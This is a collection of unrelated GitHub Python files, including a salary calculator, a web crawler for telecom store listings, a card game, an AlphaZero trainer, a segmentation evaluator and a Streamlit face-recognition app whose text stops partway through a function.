    script_contents += "%s %s" % (cvmfs_arguments, xrootd_arguments)
    script_contents += "%s %s $@\n" % (config.get('Application', 'script'), arguments)
    script_contents += "cd $curr_dir\n"
    script_contents += "rm -fr $temp_directory"
    open('job_script.sh', 'w').write(script_contents)
| DHTC-Tools/UC3 | skeleton_key/scripts/skeleton_key.py | skeleton_key.py | py | 7,715 | python | en | code | 0 | github-code | 50 |
#!/usr/bin/env python3.4
# Net-salary calculator: repeatedly asks for a tax percentage and prints the
# salary after tax, until the user types "s" (sair) or a non-positive rate.
salario = int(input("Salario? "))
# default tax rate in percent
imposto = 27
while imposto > 0:
    imposto = input("Imposto em % (ex: 27.5)? ")
    if not imposto:
        # empty input falls back to the 27% default
        imposto = 27
    elif imposto == "s":
        break
    else:
        imposto = float(imposto)
    # net salary = gross minus the tax fraction
    print("Valor real: {}".format(salario - (salario * (imposto * 0.01))))
input("Presione ENTER para sair...")
| josejnra/python | python-basics/lacos_funcoes_recursos_etc/while.py | while.py | py | 379 | python | pt | code | 3 | github-code | 50 |
18525434076 | from util import *
import json
from bs4 import BeautifulSoup
import time
def load_city():
    """Load the province/city code table from ./files/city.json.

    Returns the parsed json object (a dict with 'provinces' and 'citys' keys,
    as used by crawl_hall).
    """
    # use a context manager so the file handle is closed instead of leaked
    with open('./files/city.json', 'r') as f:
        return json.load(f)
def get_city_hall(province_code, city_code):
    """Fetch all business-hall records for one city, paging until the API
    reports an error. Returns a list of rows (one list of fields per hall)."""
    url = 'http://iservice.10010.com/e3/static/life/listHallByPropertyNew?provinceCode={}&cityCode={}&page={}'
    page = 1
    result = []
    # fields extracted from each hall record, in output column order
    keys = ['epProvincename', 'epCityname', 'epName',
            'epAddress', 'epLinkTelphone', 'epBusinessTime']
    while True:
        req = build_request(url.format(province_code, city_code, page))
        res_data = req.json()
        # the API signals "no more pages" with an errorMessage field
        if 'errorMessage' in res_data:
            break
        try:
            hall_list = res_data['BusinessHallList']
        except:
            # NOTE(review): retries the same page; may loop forever if the
            # response never contains BusinessHallList
            continue
        for hall in hall_list:
            line = []
            for key in keys:
                try:
                    line.append(hall[key])
                except:
                    # missing field -> blank cell
                    line.append('')
            result.append(line)
        print(current_time(), province_code, city_code, page, 'OK')
        page += 1
    return result
def crawl_hall():
    """Walk every province/city pair and append hall rows to ./files/result;
    cities whose fetch fails are recorded in ./files/fail for later retry."""
    city_data = load_city()
    provinces = city_data['provinces']
    city_list = city_data['citys']
    for index in range(len(provinces)):
        province_code = provinces[index][0]
        province_name = provinces[index][1]
        for city in city_list[index]:
            city_code = city[0]
            city_name = city[1]
            try:
                result = get_city_hall(province_code, city_code)
            except:
                # remember the failed province+city pair and move on
                f = open('./files/fail', 'a')
                f.write(json.dumps(
                    provinces[index]+city, ensure_ascii=False)+'\n')
                f.close()
                continue
            # one json line per hall, prefixed with the readable names
            f = open('./files/result', 'a')
            for hall in result:
                f.write(json.dumps(
                    [province_name, city_name]+hall, ensure_ascii=False)+'\n')
            f.close()
            print(current_time(), province_name, city_name, 'OK')
# entry point: crawl everything, then export the accumulated rows to xlsx
crawl_hall()
write_to_excel(load_txt('./files/result'), '联通营业厅数据.xlsx')
| 19js/Nyspider | iservice.10010.com/iservice.py | iservice.py | py | 2,126 | python | en | code | 16 | github-code | 50 |
38021585718 | """
*packageName :
* fileName : 2910_빈도 정렬_S3
* author : jihye94
* date : 2022-07-23
* description :
* ===========================================================
* DATE AUTHOR NOTE
* -----------------------------------------------------------
* 2022-07-23 jihye94 최초 생성
"""
# message length (n) and value bound (c) are read from the first input line
import collections
n, c = map(int, input().split())
# read the messages; the redundant nested list() wrapper was removed
m_arr = list(map(int, input().split()))
# Counter.most_common() sorts by descending frequency; ties keep first-seen
# order (Counter preserves insertion order), which is the required tie-break
m_count = collections.Counter(m_arr).most_common()
for value in m_count:
    for i in range(value[1]):
        print(value[0], end=" ")
| guqtls14/python-algorism-study | 박상준/정렬/2910_백준_빈도 정렬_S3.py | 2910_백준_빈도 정렬_S3.py | py | 629 | python | en | code | 0 | github-code | 50 |
39879369616 | import tkinter as tk
def create_checkbox_dict():
    """Show a tkinter window with one checkbox per news category and return
    the numeric code of the first category the user selected."""
    # category display name -> numeric category code used by the backend
    category_dict = {'Культура': '1000000', 'Правосудие': '2000000', 'Происшествия и конфликты': '3000000',
                     'Экономика и бизнес': '4000000', 'Образование': '5000000', 'Экология': '6000000',
                     'Медицина': '7000000', 'Светская жизнь': '8000000', 'Досуг, туризм и отдых': '10000000',
                     'Политика': '11000000', 'Религия': '12000000', 'Наука': '13000000', 'Общество': '14000000',
                     'Спорт': '15000000', 'Армия и ВПК': '16000000', 'Окружающая среда': '18000000'}
    selected_words = []
    words = [k for k in category_dict.keys()]
    def submit():
        # collect every checked category, then close the window
        for i, kword in enumerate(words):
            if checkboxes[i].get() == 1:
                selected_words.append(kword)
        window.destroy()
    # window size grows with the number of categories
    h = 30 * (len(words) + 5)
    wh = 200 + 140 * (len(words) // 10)
    window = tk.Tk()
    window.geometry(f"{wh}x{h}")
    window.title("Checkbox List")
    checkboxes = []
    for x, word in enumerate(words):
        var = tk.IntVar()
        checkbox = tk.Checkbutton(window, text=word.strip(), variable=var, onvalue=1, offvalue=0)
        checkbox.grid(row=x, column=1, padx=30, pady=5, sticky='W')
        checkboxes.append(var)
    submit_button = tk.Button(window, text="Submit", command=submit)
    submit_button.grid(row=len(words) + 1, column=1, columnspan=len(words), pady=45)
    window.mainloop()
    # NOTE(review): raises IndexError if the window is closed without any
    # selection; only the first selected category is returned
    return category_dict[selected_words[0]]
# manual test: show the dialog and print the chosen category code
if __name__ == '__main__':
    print(create_checkbox_dict())
| pavlinbl4/KSP_selenium_new | KSP_shoot_create/checkbox_output.py | checkbox_output.py | py | 1,724 | python | en | code | 0 | github-code | 50 |
25156254416 | from pathlib import Path
import ai
from ai.examples.alphazero import AlphaZeroMLP
def run(cfg, game, model):
    """Train `model` on `game` with AlphaZero-style self-play and return the
    final evaluation of the game task."""
    model.init().train().to(cfg.device)
    # MCTS player wraps the model for move selection during self-play
    player = ai.game.MctsPlayer(cfg.player, game, model)
    task = ai.task.GameTask(game, player, cfg.task.n_matches)
    # clean=True wipes any previous trial output at cfg.outpath
    trial = ai.Trial(cfg.outpath, task=task, clean=True)
    ai.Trainer(
        env=ai.train.RL(cfg.loss.v_weight),
        data=ai.data.SelfPlay.from_cfg(cfg, game, player),
    ).train(
        model,
        ai.opt.build(cfg.opt, model),
        trial.hook(),
        steplimit=cfg.train.steplimit,
        timelimit=cfg.train.timelimit,
    )
    return task()
def example_config():
    """Load the example config that sits next to this script."""
    return ai.Config.load(Path(__file__).parent / 'config.yaml')
# demo: train an MLP on tic-tac-toe with the example config
if __name__ == '__main__':
    cfg = example_config()
    game = ai.game.TicTacToe()
    model = AlphaZeroMLP(game)
    run(cfg, game, model)
| calvinpelletier/ai | examples/alphazero/main.py | main.py | py | 872 | python | en | code | 0 | github-code | 50 |
72056400476 | #!/usr/bin/env python
from __future__ import division, print_function
import numpy as np
import matplotlib.pyplot as plt
from rvseg import opts, patient, dataset, models
def save_image(figname, image, mask_true, mask_pred, alpha=0.3):
    """Save a 1x3 panel (input | input+prediction | input+ground-truth) to
    `figname`. `alpha` controls the transparency of the mask overlays."""
    cmap = plt.cm.gray
    plt.figure(figsize=(12, 3.75))
    plt.subplot(1, 3, 1)
    plt.axis("off")
    plt.imshow(image, cmap=cmap)
    plt.subplot(1, 3, 2)
    plt.axis("off")
    plt.imshow(image, cmap=cmap)
    plt.imshow(mask_pred, cmap=cmap, alpha=alpha)
    plt.subplot(1, 3, 3)
    plt.axis("off")
    plt.imshow(image, cmap=cmap)
    plt.imshow(mask_true, cmap=cmap, alpha=alpha)
    plt.savefig(figname, bbox_inches='tight')
    # close to free figure memory when saving many images in a loop
    plt.close()
def sorensen_dice(y_true, y_pred):
    """Sorensen-Dice coefficient 2|A.B| / (|A| + |B|) for binary masks."""
    overlap = np.sum(y_true * y_pred)
    total = np.sum(y_true) + np.sum(y_pred)
    return 2 * overlap / total
def jaccard(y_true, y_pred):
    """Jaccard index |A&B| / |A|B| for binary integer masks."""
    overlap = np.sum(y_true & y_pred)
    combined = np.sum(y_true | y_pred)
    return overlap / combined
def compute_statistics(model, generator, steps_per_epoch, return_images=False):
    """Run `model` over `steps_per_epoch` batches from `generator` and compute
    per-image Dice and Jaccard scores (mask channel 1 vs. rounded prediction).

    Returns (dices, jaccards, predictions); `predictions` is only filled when
    return_images is True, as (image, mask_true, mask_pred) tuples."""
    dices = []
    jaccards = []
    predictions = []
    for i in range(steps_per_epoch):
        images, masks_true = next(generator)
        # Normally: masks_pred = model.predict(images)
        # But dilated densenet cannot handle large batch size
        masks_pred = np.concatenate([model.predict(image[None,:,:,:]) for image in images])
        for mask_true, mask_pred in zip(masks_true, masks_pred):
            # channel 1 is the foreground class
            y_true = mask_true[:,:,1].astype('uint8')
            y_pred = np.round(mask_pred[:,:,1]).astype('uint8')
            dices.append(sorensen_dice(y_true, y_pred))
            jaccards.append(jaccard(y_true, y_pred))
        if return_images:
            for image, mask_true, mask_pred in zip(images, masks_true, masks_pred):
                predictions.append((image[:,:,0], mask_true[:,:,1], mask_pred[:,:,1]))
    print("Dice: {:.3f} ({:.3f})".format(np.mean(dices), np.std(dices)))
    print("Jaccard: {:.3f} ({:.3f})".format(np.mean(jaccards), np.std(jaccards)))
    return dices, jaccards, predictions
def main():
    """Evaluate a trained segmentation model: load data and weights, compute
    Dice/Jaccard on train and validation sets, optionally dump scores and
    per-image overlay figures."""
    # Sort of a hack:
    # args.outfile = file basename to store train / val dice scores
    # args.checkpoint = turns on saving of images
    args = opts.parse_arguments()
    print("Loading dataset...")
    augmentation_args = {
        'rotation_range': args.rotation_range,
        'width_shift_range': args.width_shift_range,
        'height_shift_range': args.height_shift_range,
        'shear_range': args.shear_range,
        'zoom_range': args.zoom_range,
        'fill_mode' : args.fill_mode,
        'alpha': args.alpha,
        'sigma': args.sigma,
    }
    train_generator, train_steps_per_epoch, \
        val_generator, val_steps_per_epoch = dataset.create_generators(
            args.datadir, args.batch_size,
            validation_split=args.validation_split,
            mask=args.classes,
            shuffle_train_val=args.shuffle_train_val,
            shuffle=args.shuffle,
            seed=args.seed,
            normalize_images=args.normalize,
            augment_training=args.augment_training,
            augment_validation=args.augment_validation,
            augmentation_args=augmentation_args)
    # get image dimensions from first batch
    images, masks = next(train_generator)
    _, height, width, channels = images.shape
    _, _, _, classes = masks.shape
    print("Building model...")
    # map the --model option to the matching builder function
    string_to_model = {
        "unet": models.unet,
        "dilated-unet": models.dilated_unet,
        "dilated-densenet": models.dilated_densenet,
        "dilated-densenet2": models.dilated_densenet2,
        "dilated-densenet3": models.dilated_densenet3,
    }
    model = string_to_model[args.model]
    m = model(height=height, width=width, channels=channels, classes=classes,
              features=args.features, depth=args.depth, padding=args.padding,
              temperature=args.temperature, batchnorm=args.batchnorm,
              dropout=args.dropout)
    m.load_weights(args.load_weights)
    print("Training Set:")
    train_dice, train_jaccard, train_images = compute_statistics(
        m, train_generator, train_steps_per_epoch,
        return_images=args.checkpoint)
    print()
    print("Validation Set:")
    val_dice, val_jaccard, val_images = compute_statistics(
        m, val_generator, val_steps_per_epoch,
        return_images=args.checkpoint)
    # two columns per row: dice, jaccard
    if args.outfile:
        train_data = np.asarray([train_dice, train_jaccard]).T
        val_data = np.asarray([val_dice, val_jaccard]).T
        np.savetxt(args.outfile + ".train", train_data)
        np.savetxt(args.outfile + ".val", val_data)
    if args.checkpoint:
        print("Saving images...")
        for i,dice in enumerate(train_dice):
            image, mask_true, mask_pred = train_images[i]
            figname = "train-{:03d}-{:.3f}.png".format(i, dice)
            save_image(figname, image, mask_true, np.round(mask_pred))
        for i,dice in enumerate(val_dice):
            image, mask_true, mask_pred = val_images[i]
            figname = "val-{:03d}-{:.3f}.png".format(i, dice)
            save_image(figname, image, mask_true, np.round(mask_pred))
# script entry point
if __name__ == '__main__':
    main()
| chuckyee/cardiac-segmentation | scripts/eval.py | eval.py | py | 5,232 | python | en | code | 274 | github-code | 50 |
33744741148 | import tensorflow as tf
import joblib
import sklearn
# from tensorflow.keras.preprocessing import image
import numpy as np
import matplotlib as plt
import gzip
# class labels in the order of the model's output units
class_names = ['Lesion', 'Normal']
# model input resolution (height, width)
IMAGE_SHAPE = (224, 224)
def load_and_prep_image(filename, img_shape=224, scale=True):
    """
    Reads in an image from filename, turns it into a tensor and reshapes into
    (224, 224, 3).
    Parameters
    ----------
    filename (str): string filename of target image
    img_shape (int): size to resize target image to, default 224
    scale (bool): whether to scale pixel values to range(0, 1), default True

    NOTE(review): the img_shape and scale parameters are currently ignored --
    the image is always resized to IMAGE_SHAPE and always divided by 255.
    """
    # Read in the image
    img = tf.io.read_file(filename)
    # Decode the read file into a tensor
    img = tf.image.decode_image(img)
    # Resize the image
    img = tf.image.resize(img, size=IMAGE_SHAPE)
    # Grayscale
    # NOTE(review): grayscale_to_rgb expects a single-channel image; confirm
    # inputs are grayscale, otherwise this call fails
    img = tf.image.grayscale_to_rgb(img)
    # Rescale the image (getting all values between 0 & 1)
    img = img / 255
    return img
def pred_and_plot(img, model_name):
    """Classify a single image file with the keras model `model_name` and
    return (predicted class name, confidence percentage)."""
    img = load_and_prep_image(img, scale=False)  # load in target image and turn it into tensor
    pred_prob = model_name.predict(
        tf.expand_dims(img, axis=0))  # make prediction on image with shape [None, 224, 224, 3]
    pred_class = class_names[pred_prob.argmax()]  # find the predicted class label
    print(f"pred: {pred_class}, prob: {pred_prob.max():.2f}")
    # # # Plot the image with appropriate annotations
    # plt.figure()
    # plt.imshow(img)  # imshow() requires float inputs to be normalized
    # plt.title(f"pred: {pred_class}, prob: {pred_prob.max():.2f}")
    #
    # plt.axis(False)
    # express the max class probability as a percentage
    confidence = round(100 * (pred_prob.max()), 2)
    return pred_class, confidence
def prep_img(img_path):
    """Read, decode, resize to 224x224 and scale an image file to [0, 1]."""
    IMG_SIZE = (224, 224)
    img = tf.io.read_file(img_path)
    img = tf.io.decode_image(img)
    img = tf.image.resize(img, IMG_SIZE)
    return img / 255
def pred_ml_model(img_path, model_name):
    """Classify an image with a flat-input (scikit-learn style) model: the
    image is flattened into one feature row before prediction.

    Returns (predicted class name, confidence percentage)."""
    img = prep_img(img_path)
    nx, ny, nrgb = img.shape
    # flatten the HxWx3 image into a single feature row
    img = np.reshape(img, (1, nx * ny * nrgb))
    pred = model_name.predict(img)
    confidence = model_name.predict_proba(img)
    confidence = confidence.tolist()
    print(confidence[0])
    # highest class probability as a percentage
    confidence = round(100 * (max(confidence[0])), 2)
    # return (f'{y_pred_prob[0, ix]:.2%}')
    pred_class = class_names[pred[0]]
    return pred_class, confidence
# img_path = "test/Late_Blight_106.jpg"
# print(pred_ml_model(img_path, KNN_model))
# print(pred_and_plot(img_path, model))
| prathameshparit/Lesion-Detection | predictions.py | predictions.py | py | 2,560 | python | en | code | 0 | github-code | 50 |
5304829131 | import datetime, time
import parsedatetime.parsedatetime as pdt
import parsedatetime.parsedatetime_consts as pdc
from django.template import Library
from django.template.defaultfilters import stringfilter
from taskmanager.framework.utilities import parsedt
register = Library()
@register.filter(name='parse_date')
@stringfilter
def parse_date(date_string, format="%a %b %d %H:%M:%S %Y"):
    """
    Return a datetime corresponding to date_string, parsed according to format.
    For example, to re-display a date string in another format::
        {{ "01/01/1970"|parse_date:"%m/%d/%Y"|date:"F jS, Y" }}
    """
    # unparseable input renders as empty in templates rather than erroring
    try:
        parsed = datetime.datetime.strptime(date_string, format)
    except ValueError:
        parsed = None
    return parsed
@register.filter(name='relative_date')
@stringfilter
def relative_date(date_string):
    """
    Return a relative date string corresponding to date_string, parsed using parsedatetime.
    Returned string will be "today @ hh:mm p" if it's today,
    "tomorrow @ hh:mm p" if it's tomorrow,
    or "<day of week> @hh:mm p" if it's within a week.
    Anything else is "mm/dd/yyyy" (note the lack of a time).
    """
    try:
        # attempt to parse it in the super-wonky way that django passes
        # dates to filters (e.g. not as nice text, sadly)
        thedate = datetime.datetime.strptime(date_string.partition('.')[0], "%Y-%m-%d %H:%M:%S")
    except ValueError:
        # now that we've exhausted our best effort, let's try the next one
        thedate = parsedt(date_string)
    try:
        # actually gets the time it was this morning
        rightnow = datetime.datetime.combine(datetime.datetime.now(), datetime.time.min)
        # and compute the difference so we can give relative dates
        diff = thedate - rightnow
    except:
        # any exception here should return nothing
        return None
    # NOTE(review): the %-I (no zero padding) strftime flag is glibc-specific
    # and fails on Windows
    if diff.days == 0: # Today
        return 'today @' + thedate.strftime("%-I:%M %p (%m/%d/%Y)") ## at 05:45 PM
    elif diff.days == 1: # Tomorrow
        return 'tomorrow @' + thedate.strftime("%-I:%M %p (%m/%d/%Y)") ## at 05:45 PM Tomorrow
    elif diff.days < 7: # one week from now
        return thedate.strftime("%A @%-I:%M %p (%m/%d/%Y)") ## at 05:45 PM Tuesday
    else:
        return 'on ' + thedate.strftime("%m/%d/%Y") ## on 10/03/1980
| falquaddoomi/cens_dev | taskmanager/templatetags/parse_date.py | parse_date.py | py | 2,322 | python | en | code | 0 | github-code | 50 |
70069960155 | from sklearn import svm
import numpy as np
# training data: alternating date/sensor log with hand-labelled occupancy
path = "currentStateFinal.txt"
f = open('data.txt','w')
dataFile = open(path, 'r')
n = 0
# Magic numbers
# hand-measured [hour, minute, second] interval boundaries of occupancy;
# hours >= 24 encode times after midnight (see the hour+24 shift below)
occupiedSet = [[22, 19, 37], [22, 39, 36], [24, 5, 15], [25, 19, 21], [25, 24, 14]]
emptySet = [[22, 38, 6], [23, 41, 58], [25, 18, 45], [25, 20, 19], [25, 26, 5]]
svmData = []
y = []
queue = []
queueSize = 15
t = 10; #tolerance
def isOccupied(time):
    """Return 1 if the [hour, minute, second] timestamp falls inside any
    hand-labelled occupied interval (widened by the global tolerance t),
    else 0."""
    # interval starts pulled earlier and ends pushed later by t seconds
    starts = [[22, 19, 37-t], [22, 39, 36-t], [24, 5, 15-t], [25, 19, 21-t], [25, 24, 14-t]]
    ends = [[22, 38, 6+t], [23, 41, 58+t], [25, 18, 45+t], [25, 20, 19+t], [25, 26, 5+t]]
    # list comparison is lexicographic, i.e. chronological for [h, m, s]
    for begin, finish in zip(starts, ends):
        if begin < time < finish:
            return 1
    return 0
# parse the log: date lines alternate with sensor (distance) lines
for line in dataFile:
    # Date line, ignore " " before line
    if (n % 2 == 0):
        result = []
        currLine = line[1:]
        datas = currLine.split(" ")
        if (len(datas) < 5):
            break
        # NOTE(review): rebinding 'time' here shadows the imported time module
        time = datas[3].split(":")
        hour = time[0]
        minute = time[1]
        second = time[2]
        # hours before 20:00 belong to the next day -> encode as hour+24
        if (int(hour) < 20):
            hour = int(hour) + 24
        if (isOccupied([int(hour), int(minute), int(second)])):
            #Occupied
            result = 0
        else:
            #Empty
            result = 50
    # Sensor line, ignore PIR sensor version
    else:
        currLine = line[1:]
        distance = currLine.split(" ")[1]
        y.append(result)
        svmData.append([int(distance)])
        # sliding average over the last queueSize distance readings
        if (len(queue) == queueSize):
            queue.pop(0)
        queue.append(int(distance[:-1]))
        f.write(str(round(sum(queue) / len(queue))) + "," + str(result) + "\n")
    n += 1
f.close()
dataFile.close()
#print(svmData)
#print(len(svmData))
#print(y)
# train a default SVC mapping raw distance -> occupancy label
#clf = svm.SVC(kernel='poly', degree=2, C=1.0)
clf = svm.SVC()
clf.fit(svmData, y)
# NOTE(review): predict expects a 2D array; newer scikit-learn versions
# require clf.predict([[i]]) -- confirm against the installed version
for i in range(200, 500):
    print(clf.predict([i]))
| jackalsin/Python | AIS_Project2016/MachineLearning.py | MachineLearning.py | py | 1,879 | python | en | code | 1 | github-code | 50 |
70249628314 | import random
import time
from random import choice
import os
def carta1():
    """Build the 40-card Spanish deck as a list of dicts.

    Each card is a dict with keys ``tipo`` (face value: 1-7 or Sota/Caballo/
    Rey), ``palo`` (suit) and ``valor`` (point value: every face card is
    worth 0.5, numeric cards are worth their number).
    """
    tipos = [1, 2, 3, 4, 5, 6, 7, "Sota", "Caballo", "Rey"]
    palos = ["Oro", "Basto", "Copa", "Espadas"]
    figuras = ("Sota", "Caballo", "Rey")
    lista_cartas = []
    for palo in palos:
        for tipo in tipos:
            valor = 0.5 if tipo in figuras else tipo
            lista_cartas.append({"tipo": tipo, "palo": palo, "valor": valor})
    return lista_cartas
def barajar():
    """Return the full 40-card deck in uniformly random order.

    Uses ``random.shuffle`` (Fisher-Yates) instead of the previous
    insert-at-random-index loop: same uniform result, clearer intent,
    and O(n) instead of O(n^2) list insertions.
    """
    cartas_barajadas = carta1()
    random.shuffle(cartas_barajadas)
    return cartas_barajadas
def sieteymedio(num_jugadores):
    """Play one round of "siete y medio" (seven and a half) for num_jugadores.

    Each player draws cards (face cards count 0.5) trying to reach 7.5
    without busting; the player whose total is closest to 7.5 wins.
    Interactive: reads answers from stdin, prints in Spanish, and clears the
    console between turns (Windows-only ``cls``).
    """
    limite = 7.5
    lista_puntuaje = []  # raw final score of each player, in turn order
    lista = []  # distance from 7.5 for each player (smaller is better)
    for jug in range(num_jugadores):
        carta_aleatoria = choice(barajar())
        suma_total = carta_aleatoria["valor"]
        print("Te ha tocado la carta " + str(carta_aleatoria["tipo"]) + " de " + str(carta_aleatoria["palo"]))
        print("Tienes " + str(carta_aleatoria["valor"]) + " puntos")
        respuesta = input("¿Quieres otra carta?: ")
        # NOTE(review): "SI".lower() is just "si", so only an exact lowercase
        # "si" continues drawing; any other answer counts as standing.
        while respuesta == "SI".lower():
            carta_aleatoria = choice(barajar())
            print("\nTe ha tocado la carta " + str(carta_aleatoria["tipo"]) + " de " + str(carta_aleatoria["palo"]))
            # NOTE(review): this removes the card from a *fresh* shuffled deck
            # that is immediately discarded, so duplicate draws are possible.
            barajar().remove(carta_aleatoria)
            suma_total += carta_aleatoria["valor"]
            if suma_total == 1:
                print("Tienes " + str(suma_total) + " punto")
            else:
                print("Tienes " + str(suma_total) + " puntos")
            if suma_total == 7.5:
                print("Has terminado")
                lista_puntuaje.append(suma_total)
                suma_total = 0
                lista.append(suma_total)  # exact 7.5 -> distance 0 (best possible)
                time.sleep(1.2)
                os.system('cls')  # NOTE(review): Windows-only screen clear
                break
            else:
                respuesta = input("¿Quieres otra carta?: ")
        else:
            # while/else: runs only when the player stands (loop not broken).
            if suma_total == 1:
                print("Te has plantado con " + str(suma_total) + " punto")
            else:
                print("Te has plantado con " + str(suma_total) + " puntos")
            lista_puntuaje.append(suma_total)
            # Convert the raw score into a distance from 7.5.
            if suma_total > limite:
                suma_total -= limite
                lista.append(suma_total)
            elif suma_total < limite:
                suma_total = limite - suma_total
                lista.append(suma_total)
            elif suma_total == limite:
                suma_total = 0
                lista.append(suma_total)
            time.sleep(1.2)
            os.system('cls')
    # The smallest distance from 7.5 wins; collect every index that ties it.
    minimo = min(lista)
    punt = minimo
    diferencias = lista
    lista_ganadores = []
    for i in range(0, len(diferencias)):
        if diferencias[i] == punt:
            lista_ganadores.append(i)
    for i in lista_ganadores:
        if len(lista_ganadores) == 1:
            print("Ha ganado el jugador " + str(lista_ganadores[0] + 1) + "\n")
        else:
            print("Han quedado empate")
    # Per-player summary; consumes both lists from the front as it prints.
    jugador = 0
    for jug in range(num_jugadores):
        print("El jugador " + str(jugador + 1) + " ha sacado un " + str(lista_puntuaje[0]) + ", se ha quedado a " + str(lista[0]) + " puntos.")
        jugador += 1
        lista.remove(lista[0])
        lista_puntuaje.remove(lista_puntuaje[0])
# Kick off a two-player game when the module is run.
(sieteymedio(2))
| XxEduBoss/ejerciciospython | 7ymedio.py | 7ymedio.py | py | 3,737 | python | es | code | 0 | github-code | 50 |
import turtle

# 800x600 window anchored at the top-left corner of the screen.
turtle.setup(800, 600, 0, 0)
screen = turtle.Screen()
screen.bgcolor('white')

# Blue pen drawing at maximum speed.
pen = turtle.Pen()
pen.color('blue')
pen.speed(0)

# Each step is one unit longer and slightly thicker than the last; turning
# 59 degrees (just under 60) makes the hexagon-like path rotate slowly,
# producing an outward spiral.
for step in range(200):
    pen.width(step / 100 + 1)
    pen.forward(step)
    pen.left(59)

# Keep the window open until it is clicked.
turtle.exitonclick()
| mentecatoDev/intermezzo | docs/eje_la_tortuga_que_dibuja/eje0202.py | eje0202.py | py | 271 | python | en | code | 1 | github-code | 50 |
35721310194 | import streamlit as st
import numpy as np
import onnxruntime as rt
import mediapipe as mp
import os
import cv2
import av
from typing import List
from streamlit_webrtc import webrtc_streamer, WebRtcMode
from twilio.rest import Client
from skimage.transform import SimilarityTransform
from types import SimpleNamespace
from sklearn.metrics.pairwise import cosine_distances
# ---------------------------------------------------------------------------------------------------------------------
# Define a class to store a detection
class Detection(SimpleNamespace):
    """A single detected face: bounding box plus five alignment landmarks.

    Being a SimpleNamespace, instances also accept extra attributes
    (detect_faces adds ``idx`` and ``confidence``).
    """

    # [[x_min, y_min], [x_max, y_max]] in source-frame pixel coordinates
    bbox: List[List[float]] = None
    # Five (x, y) pixel points used for face alignment (see detect_faces)
    landmarks: List[List[float]] = None
# Define a class to store an identity
class Identity(SimpleNamespace):
    """A recognized face: detection, name, embedding and aligned crop."""

    # Detection this identity was built from (left at the default for
    # gallery entries, which are constructed without one)
    detection: Detection = Detection()
    # Gallery name (the uploaded file's stem); None for live subjects
    name: str = None
    # Embedding vector produced by the ONNX face recognizer
    embedding: np.ndarray = None
    # 112x112 aligned face crop (input to the recognizer / gallery preview)
    face: np.ndarray = None
# Define a class to store a match
class Match(SimpleNamespace):
    """A subject-to-gallery pairing whose distance passed the threshold."""

    # Live subject being matched
    subject_id: Identity = Identity()
    # Gallery identity it matched against
    gallery_id: Identity = Identity()
    # Cosine distance between the two embeddings (lower = more similar)
    distance: float = None
    # Appears unused in this module; the display name is read from
    # gallery_id.name instead
    name: str = None
# Similarity threshold for face matching.
# NOTE(review): this is a *cosine distance* cutoff; 1.0 only rejects pairs
# whose embeddings are anti-correlated, so matching is very permissive --
# confirm this is intended.
SIMILARITY_THRESHOLD = 1.0
# Get twilio ice server configuration using twilio credentials from environment variables (set in streamlit secrets)
# Ref: https://www.twilio.com/docs/stun-turn/api
ICE_SERVERS = Client(os.environ["TWILIO_ACCOUNT_SID"], os.environ["TWILIO_AUTH_TOKEN"]).tokens.create().ice_servers
# Init face detector and face recognizer (loaded once at module import;
# FaceMesh is configured to track up to 7 faces per frame).
FACE_RECOGNIZER = rt.InferenceSession("model.onnx", providers=rt.get_available_providers())
FACE_DETECTOR = mp.solutions.face_mesh.FaceMesh(
    refine_landmarks=True, min_detection_confidence=0.5, min_tracking_confidence=0.5, max_num_faces=7
)
# ---------------------------------------------------------------------------------------------------------------------
def detect_faces(frame: np.ndarray) -> List[Detection]:
    """Detect faces in an RGB frame using MediaPipe FaceMesh.

    Returns one Detection per face, carrying a pixel-space bounding box and
    five alignment landmarks (mesh indices 470/475/1/57/287 -- presumably the
    iris centres, nose tip and mouth corners; confirm against the FaceMesh
    topology).
    """
    # Process the frame with the face detector
    result = FACE_DETECTOR.process(frame)
    # Initialize an empty list to store the detected faces
    detections = []
    # Check if any faces were detected
    if result.multi_face_landmarks:
        # Iterate over each detected face
        for count, detection in enumerate(result.multi_face_landmarks):
            # Select 5 Landmarks
            five_landmarks = np.asarray(detection.landmark)[[470, 475, 1, 57, 287]]
            # Extract the x and y coordinates of the landmarks of interest
            # (the landmarks are normalized; multiply by frame size for pixels)
            landmarks = np.asarray(
                [[landmark.x * frame.shape[1], landmark.y * frame.shape[0]] for landmark in five_landmarks]
            )
            # Extract the x and y coordinates of all landmarks
            all_x_coords = [landmark.x * frame.shape[1] for landmark in detection.landmark]
            all_y_coords = [landmark.y * frame.shape[0] for landmark in detection.landmark]
            # Compute the bounding box of the face from the landmark extremes
            x_min, x_max = int(min(all_x_coords)), int(max(all_x_coords))
            y_min, y_max = int(min(all_y_coords)), int(max(all_y_coords))
            bbox = [[x_min, y_min], [x_max, y_max]]
            # Create a Detection object for the face (FaceMesh gives no
            # per-face confidence, hence confidence=None)
            detection = Detection(idx=count, bbox=bbox, landmarks=landmarks, confidence=None)
            # Add the detection to the list
            detections.append(detection)
    # Return the list of detections
    return detections
def recognize_faces(frame: np.ndarray, detections: List[Detection]) -> List[Identity]:
    """Align each detected face and compute its embedding.

    Each face is similarity-warped onto the fixed 112x112 five-point template
    (the one used in training, per the comment below) and run through the
    ONNX recognizer; one Identity (without a name) is returned per detection.
    """
    if not detections:
        return []
    identities = []
    for detection in detections:
        # ALIGNMENT -----------------------------------------------------------
        # Target landmark coordinates (as used in training)
        landmarks_target = np.array(
            [
                [38.2946, 51.6963],
                [73.5318, 51.5014],
                [56.0252, 71.7366],
                [41.5493, 92.3655],
                [70.7299, 92.2041],
            ],
            dtype=np.float32,
        )
        # Estimate the similarity transform mapping detected landmarks onto
        # the template, then warp the frame into a 112x112 aligned crop.
        tform = SimilarityTransform()
        tform.estimate(detection.landmarks, landmarks_target)
        tmatrix = tform.params[0:2, :]
        face_aligned = cv2.warpAffine(frame, tmatrix, (112, 112), borderValue=0.0)
        # ---------------------------------------------------------------------
        # INFERENCE -----------------------------------------------------------
        # Inference face embeddings with onnxruntime
        # (batch of one, float32, scaled into [0, 1])
        input_image = (np.asarray([face_aligned]).astype(np.float32) / 255.0).clip(0.0, 1.0)
        embedding = FACE_RECOGNIZER.run(None, {"input_image": input_image})[0][0]
        # ---------------------------------------------------------------------
        # Create Identity object
        identities.append(Identity(detection=detection, embedding=embedding, face=face_aligned))
    return identities
def match_faces(subjects: List[Identity], gallery: List[Identity]) -> List[Match]:
    """Match each detected subject against the gallery by embedding distance.

    A subject matches its closest gallery identity when their cosine distance
    is below SIMILARITY_THRESHOLD; at most one match is produced per subject.
    """
    if len(gallery) == 0 or len(subjects) == 0:
        return []
